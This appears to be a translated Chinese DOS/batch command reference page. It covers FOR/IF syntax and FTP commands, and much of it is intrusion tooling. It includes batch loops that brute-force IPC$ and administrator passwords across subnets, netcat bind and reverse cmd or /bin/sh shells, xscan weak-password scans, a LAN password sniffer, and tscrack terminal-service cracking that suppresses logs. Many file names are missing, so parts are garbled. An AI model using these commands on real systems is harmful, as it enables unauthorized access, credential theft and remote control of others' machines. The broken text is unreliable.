SoFunction
Updated on 2025-04-14

DOS Command Dictionary 2 Page 2/2


Attachment: Batch commands and variables
1: FOR command and variables. Basic format:
FOR /parameter %variable IN (set) DO command [command_parameters]. %variable: a single-letter replaceable parameter, e.g. %i; inside a batch file it is written %%i, and %i% is used when calling a variable. The variable is case sensitive (%i is not the same as %I).
A batch file can handle 10 such variables, %0-%9: %0 is by default the batch file name, %1 is the first value entered when the batch is run, and likewise %2-%9 are the 2nd-9th values entered. Example: in net use \\ip\ipc$ pass /user:user, ip is %1, pass is %2 and user is %3.
(set): one file or a group of files; wildcards may be used, e.g. (D:\), or a numeric range such as (1 1 254) or (1 -1 254). In (1 1 254) the first 1 is the start value, the second 1 is the step and 254 is the end value, i.e. from 1 to 254; (1 -1 254) counts down from 254 to 1.
command: the command to execute for each file, e.g. net use; to execute several commands, separate them with &.
command_parameters: parameters or command-line switches for the given command.
IN (set): take the values from (set); DO command: execute command.
Parameters: /L iterates over a numeric range { (set) is written as a range }; /F reads values from a file one after another until the file is exhausted { (set) is a file, e.g. (d:\) }.
Examples of usage:
@echo off
echo Usage format: *.*.* >
for /L %%G in (1 1 254) do echo %1.%%G >> & net use \\%1.%%G /user:administrator | find "Command completed successfully">>
Save as a batch file. Description: for the 254 IPs of the given Class C network segment, try to establish an IPC$ connection with an empty administrator password; if it succeeds, the IP is recorded.
/L means a numeric range (here 1-254 or 254-1); the first three octets of the IP entered (*.*.*) are %1, the batch's first argument; %%G is the loop variable (the last octet of the IP); & separates the two commands echo and net use; | passes the result to find, which checks for the "Command completed successfully" message after the IPC$ connection is made; %1.%%G is the complete IP address; (1 1 254) gives the start value, step and end value.
@echo off
echo Usage format: ip
FOR /F %%i IN (D:\) DO  %1 %%i D:\ 200
Save as a batch file. Description: after an IP is entered, the dictionary file d:\ is used to try the password of the user in d:\ until the file is exhausted. %%i is the user name; %1 is the entered IP address (the batch's first argument).
2: IF command and variables. Basic format:
IF [not] Errorlevel number command: if the exit code of the last program run is equal to or greater than the specified number, the condition is true.
Example: IF Errorlevel 0 command runs command when the program returned 0; IF not Errorlevel 1 command runs command when the value returned by the program is not equal to 1.
0 means the item was found and the command succeeded (true); 1 means not found or not executed (false).
IF [not] string1==string2 command: if the two text strings match (string1 equals string2), the subsequent command is executed.
Example: if "%2%"=="4" goto start means: if the second value entered is 4, jump to the following command (note: when calling the variable, write %variable name% and enclose it in double quotes).
IF [not] exist filename command: if the specified file exists, the subsequent command is executed.
Example: if not  goto end means: if the file is not found, jump to the :end label.
IF [not] Errorlevel number command else command, IF [not] string1==string2 command else command, or IF [not] exist filename command else command. The command after else runs when the condition is not true. Note: else is only valid on the same line as if. When a del command is used, the whole del command must be enclosed in < >, because del is only executed as a single line; with < > it is treated as one line. For example: if exist . <del .> else echo  ; pay attention to the "." in the command.
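A self-contained batch script, added here as an example and not part of the original page, that exercises the constructs above on an input file it constructs itself: FOR /L with (start step end), FOR /F with tokens and delims, a quoted string comparison, IF [NOT] EXIST ... ELSE on one line, and IF ERRORLEVEL after find. The log file path, record format and the use of parentheses for grouping (what cmd.exe accepts) are assumptions of this example.

```batch
@echo off
setlocal enabledelayedexpansion
rem Added example (not from the original page): exercises FOR /L, FOR /F with
rem tokens/delims, IF string==string, IF [NOT] EXIST ... ELSE on one line and
rem IF ERRORLEVEL. The input file is constructed here so the script runs offline.

set "LOGFILE=%TEMP%\audit_sample.txt"
rem %1 is the first argument; default to looking for FAILED records.
if "%~1"=="" (set "WANTED=FAILED") else (set "WANTED=%~1")

rem (1) FOR /L %%N in (start step end): write five constructed "hostN;status" records.
if exist "%LOGFILE%" del "%LOGFILE%"
for /L %%N in (1 1 5) do (
    set "STATUS=OK"
    if %%N==2 set "STATUS=FAILED"
    if %%N==4 set "STATUS=FAILED"
    rem STATUS is read with delayed expansion because it was set inside this block.
    >> "%LOGFILE%" echo host%%N;!STATUS!
)

rem (2) IF NOT EXIST ... ELSE must stay on one line; parentheses group the commands.
if not exist "%LOGFILE%" (echo no input file & goto :end) else (echo reading "%LOGFILE%")

rem (3) FOR /F with tokens/delims: %%H gets token 1 (host), %%S gets token 2 (status).
set /a HITS=0
for /F "usebackq tokens=1,2 delims=;" %%H in ("%LOGFILE%") do (
    if "%%S"=="%WANTED%" (
        echo %%H reported %%S
        set /a HITS+=1
    )
)

rem (4) IF ERRORLEVEL: find returns 0 when the string is found, 1 when it is not.
find "FAILED" "%LOGFILE%" >nul
if errorlevel 1 (echo find: no FAILED records) else (echo find: FAILED records present)

echo %HITS% record(s) matched "%WANTED%"
:end
endlocal
```

Run it with no argument to count the FAILED records, or pass OK as the first argument to count the others.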
(II) External commands (all of the tools below must be downloaded separately):
1. Swiss Army Knife (nc):
Parameter description:
-h  Show help
-d  Background mode
-e prog  Program redirection: once a connection is made, prog is executed [dangerous]
-i secs  Delay interval
-l  Listening mode, for inbound connections
-L  Listening mode; keep listening after a connection closes, until Ctrl+C
-n  Numeric IP addresses only; domain names cannot be used
-o file  Record the transmission in hexadecimal to file
-p port  Local port number
-r  Random local and remote ports
-t  Use Telnet negotiation
-u  UDP mode
-v  Verbose output; -vv is more verbose
-w number  Timeout interval
-z  Turn off input and output (used when scanning a target)
Basic usage:
nc -nvv 192.168.0.1 80  Connect to port 80 of host 192.168.0.1
nc -l -p 80  Open TCP port 80 on this machine and listen
nc -nvv -w2 -z 192.168.0.1 80-1024  Scan ports 80-1024 of target 192.168.0.1
nc -l -p 5354 -t -e c:  Bind a cmd shell to TCP port 5354 on the remote host
nc -t -e c: 192.168.0.2 5354  Bind a cmd shell on the remote host and connect it back (reverse connection) to port 5354 of 192.168.0.2
Advanced usage:
nc -L -p 80  Honeypot use 1: open port 80 and keep listening until Ctrl+C
nc -L -p 80 > c:\  Honeypot use 2: open port 80, keep listening until Ctrl+C, and write the output to c:\
nc -L -p 80 < c:\  Honeypot use 3-1: open port 80, keep listening until Ctrl+C, and feed the contents of c:\ into the pipe; this can also serve to transfer a file
c:\honeyport | nc -L -p 80  Honeypot use 3-2: open port 80, keep listening until Ctrl+C, and pipe the contents of c:\ in; this can also serve to transfer a file.
On this machine: nc -l -p local-port
On the other host: nc -e  local-IP -p local-port  *win2K
nc -e /bin/sh local-IP -p local-port  *linux, unix. Reverse connection: the other host connects back, which gets through that host's firewall.
On this machine: nc -d -l -p local-port < path-and-name-of-the-file-to-send
On the other host: nc -vv local-IP local-port > path-and-name-to-save-as, to transfer a file to the other host
Remarks:
|  pipe
< or >  redirection. "<", for example tlntadmn < , feeds the content to the tlntadmn command
@  the command after @ is executed without being displayed (background execution); e.g. @dir c:\winnt >> d:\ runs dir in the background and stores the result in d:\
> and >>  ">" overwrites; ">>" appends.
For example, @dir c:\winnt >> d:\ and @dir c:\winnt > d:\ run separately: the first appends its result to the file, while the second overwrites the previous result.
2. Scanner (xscan):
Basic format
xscan -host <start IP>[-<end IP>] <detection items> [other options]  Scan all hosts in the target range from start IP to end IP
xscan -file <host list file> <detection items> [other options]  Scan all hosts listed in the target host list file
Detection items
-active  Check whether the host is alive
-os  Detect the remote operating system type (via NETBIOS and SNMP)
-port  Detect the status of commonly used service ports
-ftp  Detect weak FTP passwords
-pub  Detect write permission for anonymous FTP users
-pop3  Detect weak POP3 server passwords
-smtp  Detect SMTP server vulnerabilities
-sql  Detect weak SQL Server passwords
-smb  Detect weak NT server passwords
-iis  Detect IIS encoding/decoding vulnerabilities
-cgi  Detect CGI vulnerabilities
-nasl  Load Nessus attack scripts
-all  Test all of the above items
Other options
-i adapter-number  Set the network adapter; the adapter number can be obtained with -l
-l  List all network adapters
-v  Show detailed scan progress
-p  Skip unresponsive hosts
-o  Skip hosts on which no open port was detected
-t threads,hosts  Maximum number of concurrent threads and concurrent hosts; the default is 100,10
-log filename  Scan report file name (the .txt or .html suffix selects the format)
Usage examples
xscan -host 192.168.1.1-192.168.255.255 -all -active -p  Detect all vulnerabilities on the hosts in the range 192.168.1.1-192.168.255.255, skipping unresponsive hosts
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o  Detect the standard port status and NT weak-password users of the hosts in 192.168.1.1-192.168.255.255, with at most 150 concurrent threads, skipping hosts with no open ports detected
xscan -file  -port -cgi -t 200,5 -v -o  Detect the standard port status and CGI vulnerabilities of all hosts listed in the "" file, with at most 200 concurrent threads and at most 5 hosts at a time, showing detailed progress and skipping hosts with no open ports detected
3. Command-line sniffer:
Captures FTP/SMTP/POP3/HTTP passwords on the LAN
Parameter description
-tcp  Output TCP datagrams
-udp  Output UDP datagrams
-icmp  Output ICMP datagrams
-pass  Filter for password information
-hide  Run in the background
-host  Resolve host names
-addr IP-address  Filter by IP address
-port port  Filter by port
-log filename  Save the output to the file
-asc  Output in ASCII
-hex  Output in hexadecimal
Usage examples
-pass -hide -log   Run in the background sniffing passwords and save the password information to the file
-tcp -udp -asc -addr 192.168.1.1  Sniff 192.168.1.1, filtering TCP and UDP traffic, and output in ASCII
4. Terminal service password cracking (tscrack):
Parameter description
-h  Show usage help
-v  Show version information
-s  Detect decryption ability on the screen
-b  Beep when a password is wrong
-t  Make multiple connections at the same time (multi-threaded)
-N  Prevent system log entries on the targeted server
-U  Uninstall and remove the tscrack component
-f  Use the password given after -f
-F  Interval (frequency)
-l  Use the user name given after -l
-w  Use the password dictionary given after -w
-p  Use the password given after -p
-D  Log in to the main page
Usage examples
tscrack 192.168.0.1 -l administrator -w   Use the password dictionary file to crack the host's administrator login password remotely
tscrack 192.168.0.1 -l administrator -p 123456  Log in remotely as the administrator user of 192.168.0.1 with the password 123456
@if not exist  goto noscan
@for /f "tokens=1 delims= " %%i in () do call  %%i
:noscan
@echo  no find or scan faild
(① Save as the first batch file) (Assume SuperScan or another scanner was used to produce a list file of host IPs with port 3389 open)
Meaning: take one IP at a time from the file and run the second batch with it
@if not exist  goto noscan
@tscrack %1 -l administrator -w  >>
:noscan
@echo  no find or scan faild
(② Save as the second batch file) (Run the first one, with ,,,, in the same directory, and wait for the result)
Meaning: try the dictionary against the administrator password of every host and save the cracking results to a file.
5. Others:

Shutdown \\IP t:20  Shut down the other party's NT after 20 seconds (the tool comes with Windows 2003; on Windows 2000 it must be downloaded. It is described in detail under the Windows 2003 DOS commands in the previous section.)
(fpipe, TCP port redirection tool) Detailed instructions are in the second article (port redirection to bypass the firewall)
fpipe -l 80 -s 1029 -r 80 [url][/url]  When someone scans your port 80, what they see is entirely the host information of the redirect target
fpipe -l 23 -s 88 -r 23 target-IP  A Telnet request from this machine is redirected through local port 88 to port 23 of the target IP (when the Telnet session with the target is set up, local port 88 is the one that connects to it). Then: telnet 127.0.0.1 (local IP) connects directly to port 23 of the target IP. (Remotely enabling the telnet tool)
\\IP account password NTLM-authentication-method telnet-port  (No upload needed, and it does not break Microsoft's authentication method.) After remotely enabling the other party's telnet service, connect with telnet \\ip .
NTLM authentication method: 0: do not use NTLM authentication; 1: try NTLM authentication first and fall back to user name and password if it fails; 2: use NTLM authentication only.
(Another tool included with OpenTelnet)
\\IP account password  After connecting to the other party with Telnet, use this command to restore the other party's Telnet settings and stop the Telnet service at the same time.
6. FTP commands in detail:
FTP commands are among the most frequently used by Internet users. Being familiar with the FTP internal commands and applying them flexibly is a great convenience and doubles productivity. To use FTP for background downloads, you must learn the FTP commands.
The command line format of FTP is:
ftp -v -d -i -n -g [hostname], where
-v  Display all responses from the remote server;
-n  Disable ftp's automatic login, i.e. do not use the .netrc file;
-d  Use debugging mode;
-g  Disable file name globbing (wildcard expansion).
The FTP internal commands are as follows (brackets indicate optional arguments):
1. ![cmd [args]]: Run an interactive shell on the local machine; exit returns to the ftp environment, e.g. !ls *.zip
2. $ macro-name [args]: Execute the macro macro-name.
[password]: Provide an additional password required to access system resources after logging in to the remote system successfully.
local-file [remote-file]: Append the local file to a file on the remote host; if no remote file name is given, the local file name is used.
: Use ASCII transfer mode.
: Ring the bell after each command completes.
: Use binary transfer mode.
: Exit the ftp session.
: When using mget, convert uppercase letters in remote file names to lowercase.
remote-dir: Change to the given directory on the remote host.
: Change to the parent of the current remote directory.
mode file-name: Set the permissions of the remote file file-name to mode, e.g. chmod 777 .
: End the ftp session with the remote server (the counterpart of open).
: When transferring in ascii mode, convert carriage return plus line feed into a line feed.
remote-file: Delete the remote file.
[debug-value]: Set debugging mode, displaying each command sent to the remote host, e.g. deb up 3; setting it to 0 turns debugging off.
[remote-dir][local-file]: Displays the remote host directory and saves the results to the local file.
: Same as close.
format: Set the file transfer form to format; the default is file.
remote-file[local-file]: Pass the remote-file file of the remote host to the local hard disk local-file.
: Toggle file name expansion for mdelete, mget and mput; off by default, the same as the -g command-line option.
: Display a hash mark (#) for each 1024 bytes transferred.
[cmd]: Display help for the ftp internal command cmd, e.g. help get.
[seconds]: Set the remote server's idle timer to seconds.
: Set the binary transmission method (same as binary).
[dir]: Switch the local working directory to dir.
[remote-dir][local-file]: Display the remote directory remote-dir and save the local file local-file.
macro-name: Define a macro; the definition ends at the first empty line after macdef.
[remote-file]: Delete the remote host file.
remote-files local-file: Similar to dir, but can specify multiple remote files, such as: mdir *.o.*.zipoutfile .
remote-files: Transfer multiple remote files.
dir-name: Create a directory in the remote host.
remote-file local-file: same as nlist, but multiple file names can be specified.
[modename]: Set the file transfer method to modename, the default is stream method.
file-name: Displays the last modification time of the remote host file.
local-file: Transfer multiple files to a remote host.
file-name: If the modification time of file-name in the remote machine is closer than the time of the file with the same name on the local hard disk, the file will be retransmitted.
[remote-dir][local-file]: Displays a list of files in the remote host directory and saves them to the local hard disk local-file.
[inpattern outpattern]: Set the file name mapping mechanism so that parts of a file name are rearranged when the file is transferred. For example, with nmap $1.$2.$3 [$1,$2].[$2,$3], the file a1.a2.a3 is transferred under the name a1,a2. This command is especially useful when the remote host is not a UNIX machine.
[inchars [outchars]]: Set the translation of file name characters, e.g. ntrans LR turns the file name LLL into RRR.
host [port]: Connect to the specified ftp server, optionally on the given port.
: Enter passive transmission mode.
: Set interactive prompts when multiple files are transferred.
ftp-cmd: Execute an ftp command on the secondary control connection; this allows two ftp servers to be connected so that files are transferred between them. The first such command must be open, to establish the connection between the two servers.
local-file[remote-file]: Transfer local-file to the remote host.
: Displays the current working directory of the remote host.
: Same as bye, exit the ftp session.
arg1, arg2...: Send parameters literally to the remote ftp server, such as: quote syst.
remote-file[local-file]: same as get.
remote-file[local-file]: Similar to get, but if local-file exists, it will be transferred from the last transmission interruption.
[cmd-name]: Request help from the remote host.
[file-name]: If the file name is not specified, the status of the remote host will be displayed, otherwise the file status will be displayed.
[from][to]: Change the remote host file name.
: Clear the reply queue.
marker: Start get or put again from the specified marker, such as: restart 130.
dir-name: Delete the remote host directory.
: Store files under unique names only; if a file already exists, the suffix .1, .2, etc. is appended.
local-file[remote-file]: same as put.
: Set the use of PORT command.
arg1, arg2...: Send parameters verbatim as SITE commands to the remote ftp host.
file-name: Display the size of the remote file (example given: site idle 7200).
: Display the current ftp status.
[struct-name]: Set the file transfer structure to struct-name, and the stream structure is used by default.
: Store remote files under unique names only (the counterpart of runique).
: Displays the operating system type of the remote host.
: Set the file transfer type to the one required by TENEX machines.
: Toggle the byte counter during transfers.
: Toggle packet tracing.
[type-name]: Set the file transfer type to type-name, the default is ascii, such as: type binary, set the binary transmission method.
[newmask]: Set the default umask of the remote server to newmask, such as: umask 3
user-name [password] [account]: Identify yourself to the remote host; a password must be entered when one is required, e.g. user anonymous my@email.
: Same as the -v command-line option: verbose mode, showing all replies from the ftp server to the user; on by default.
73. ? [cmd]: Same as help.
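A batch wrapper for the background download the section above motivates, added here as an example and not part of the original page. It drives ftp with -n (no auto-login) and supplies the credentials with the user command listed above; it assumes Windows ftp.exe, which reads its commands from a file given with -s:, and the host, account and file name are placeholders.

```batch
@echo off
setlocal
rem Added example (not from the original page): non-interactive FTP download
rem driven from a batch file. Assumes Windows ftp.exe, which accepts a command
rem script via -s:<file>. Host, account and file name below are placeholders.

set "FTPHOST=ftp.example.invalid"
set "FTPUSER=anonymous"
set "FTPPASS=user@example.invalid"
set "REMOTEFILE=README.TXT"
set "SCRIPT=%TEMP%\ftpjob.txt"

rem With -n the client does not log in by itself, so the script opens the
rem connection and identifies with "user name password" (see the user command).
> "%SCRIPT%" echo open %FTPHOST%
>>"%SCRIPT%" echo user %FTPUSER% %FTPPASS%
>>"%SCRIPT%" echo binary
>>"%SCRIPT%" echo hash
>>"%SCRIPT%" echo get %REMOTEFILE%
>>"%SCRIPT%" echo bye

rem -n: no auto-login; -i: no per-file prompting; -v: show every server reply.
ftp -n -i -v -s:"%SCRIPT%"
del "%SCRIPT%"

rem ftp.exe does not report transfer failure through ERRORLEVEL, so check the result.
if exist "%REMOTEFILE%" (echo downloaded %REMOTEFILE%) else (echo transfer failed & exit /b 1)
endlocal
```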